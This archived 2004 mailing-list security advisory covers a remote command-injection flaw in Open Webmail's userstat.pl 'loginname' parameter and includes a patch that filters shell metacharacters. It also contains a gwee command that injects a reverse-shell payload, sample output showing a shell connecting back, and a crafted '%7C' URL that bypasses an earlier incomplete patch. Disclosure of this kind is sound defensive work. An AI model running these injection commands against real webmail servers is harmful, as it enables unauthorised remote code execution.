| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200405100129.01331.michel@cycom.se>
From: michel at cycom.se (Michel Blomgren)
Subject: CSA-200402-1: Previous Open Webmail vulnerability is exploitable
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cycom AB Security Advisory CSA-200402-1
www.cycom.se
Advisory: Previous Open Webmail vulnerability is exploitable
Date: Sat Feb 21 15:18:21 CET 2004,
updated: Thu May 6 10:37:29 CEST 2004
Application: Open Webmail 2.20, 2.21 and 2.30 (and -current)
Vulnerability: Remote arbitrary command exection
Availability: http://openwebmail.org
Platforms: OS independent (multiple *NIXes)
Status: Patch is available (included in this advisory)
Reference: CSA-200402-1
Author: Michel Blomgren <michel@...om.se>
SYNOPSIS
"Open WebMail is a webmail system based on the Neomail version 1.14
from Ernie Miller. Open WebMail is designed to manage very large mail
folder files in a memory efficient way. It also provides a range of
features to help users migrate smoothly from Microsoft Outlook to
Open WebMail."
-- http://openwebmail.org
VULNERABILITY
Nullbyte and Syscalls discovered that a near obsolete script named
userstat.pl shipped with Open Webmail 2.20, 2.21 and 2.30 doesn't
filter out dangerous *nix shell characters from the "loginname"
parameter. The "loginname" parameter is used as an argument when
executing openwebmail-tool.pl from the vulnerable script. By adding a
";", "|" or "( )" followed by the shell command to a http GET, HEAD
or POST request an attacker can execute arbitrary system commands as
an unprivileged user (the Apache user, "nobody" or "www", e.g.).
DISCOVERY
The vulnerability was found by Nullbyte and Syscalls of UDC.
EXPLOIT
At least 2 exploits are in circulation, one by Nullbyte and one re-write by
Shadowinteger. Exploitation of openwebmail-current.tgz (2004-04-30 5.8MB) is
limited (read the "FIX" section below). You can use Gwee (generic web
exploitation engine) available from http://cycom.se/dl/gwee to exploit using
the following command:
$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://target/cgi-bin/openwebmail/userstat.pl
-L Use built-in TCP listener (like "nc -l").
-l The host or IP address to have the reverse shellcode connect
back to.
-p The port to have the reverse shellcode connect back to.
For example...
$ gwee -y'loginname=%3B' -l localhost -p12345 -Lf localhost/userstat.cgi
!!!
` ___ '
- (0 0) -
- -----oOo(_)oOo---------------------------------------- ----- --- -- - -
gwee 1.21 - generic web exploitation engine
Copyright (C) 2004 Michel Blomgren <shadowinteger@...tinix.org>
Perl and Python shellcode by Sabu <sabu@...tinix.org>
Acknowledgements: Sabu and Nullbyte
[i] target: localhost
[i] using POST requests to send data
[i] shellcode: Sabu's reverse Perl shellcode (portable)
[i] injection method: perl -e
[+] resolving localhost into an ip address
[i] shellcode will connect to 127.0.0.1 on port 12345
[i] will listen for incoming connection on port 12345
[+] attempting to inject shellcode into target
[+] listening for incoming connection on port 12345, timeout is 30 seconds
[i] got connection from 127.0.0.1:33670
Linux luserland 2.4.22-openmosix-1 #1 Thu Mar 18 09:55:31 CET 2004 i686 unknown
12:05:52 up 3:56, 7 users, load average: 0.08, 0.02, 0.01
FIX
Cycom AB has provided a diff patch that will fix the issue. Ken Girrard
<kgirrard.AT.users.sourceforge.net> wrote and published an advisory long
before this one. He provided a patch with his advisory which results in
userstat.pl still being vulnerable to remote arbitrary command execution, this
patch is applied to (shipped with) openwebmail-current.tgz released 2004-04-30
(5.8MB).
Girrard's patch doesn't filter out "|" (pipes) and "/", but does filter out
spaces and tabs, which makes it impossible to pass arguments to commands an
attacker would want to execute. Nevertheless, it's still possible to execute
commands without arguments. An example of such an attack would be an attacker
that has write access to the box using e.g. FTP and uploads a reverse
shellcode, marks it executable and enters the absolute path to it in a crafted
URL like this one for example:
http://target/cgi-bin/openwebmail/userstat.pl&loginname=%7C/home/fu/bar
Our patch follows...
- --<snip>--
- --- userstat.pl.orig 2004-02-20 14:58:06.000000000 +0100
+++ userstat.pl 2004-02-21 18:05:16.000000000 +0100
@@ -52,6 +52,9 @@
my $html=qq|<a href="_URL_" target="_blank" style="text-decoration: none">|.
qq|<font color="_COLOR_">_TEXT_</font></a>|;
+# filter out dangerous characters
+$user =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;
+
if ($user ne "") {
my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`;
if ($status =~ /has no mail/) {
- --<snip>--
Enter cgi-bin/openwebmail/ and run:
$ patch -i owm.patch
ACKNOWLEDGMENTS
I would like to thank the following people:
Sabu, Nullbyte and Syscalls.
ABOUT CYCOM AB
Cycom AB is a newly started firm specializing in information security
services (penetration testing, risk assessment, source code review,
disaster/incident management and education). Visit us at
www.cycom.se.
- --
Michel Blomgren
Cycom AB
http://www.cycom.se
______________________________________________
PGP: http://www.cycom.se/misc/pubkeymichel.asc
886A 7B17 1747 6C82 7A7E
EAC0 A3F1 2943 101C 18FA
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)
iD8DBQFAnr6po/EpQxAcGPoRAudxAJ981KZ3PAq1mTH2Fbcbnu1ZvlvzAACfdV0h
0fzjuRdQkaua1yEJptqFyU4=
=tY6l
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists